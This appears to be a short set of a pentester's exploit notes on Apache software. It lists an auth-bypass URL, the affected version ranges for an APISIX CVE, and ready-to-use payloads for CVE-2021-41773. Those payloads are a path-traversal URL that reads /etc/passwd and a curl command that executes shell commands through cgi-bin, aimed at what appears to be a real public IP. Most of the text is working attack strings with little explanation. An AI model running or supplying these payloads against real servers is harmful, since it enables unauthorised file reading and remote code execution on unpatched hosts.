Apache 2.4.38 auth bypass

<http://10.10.10.249/admin../admin_staging/>

CVE-2022-24112 - APISIX

Affected version

Apache APISIX 1.3 – 2.12.1

Apache APISIX 2.10.0 – 2.10.4 LTS

Unaffected version

Apache APISIX 2.12.1 (excluding 2.12.1)

Apache APISIX 2.10.4 (LTS versions) (excluding 2.10.4)

Untitled

poc

Untitled

CVE-2021-41773 - Apache HTTP Server 2.4.49 Path Traversal

LFI:
<https://URL/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd>

RCE:
**curl --data "A=|id>/tmp/x" '<http://2.133.131.182/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh>' -vv**

https://twitter.com/ducnt_/status/1445386557574324234

CVE-2021-42013 - Apache 2.4.50 still VULN Path Traversal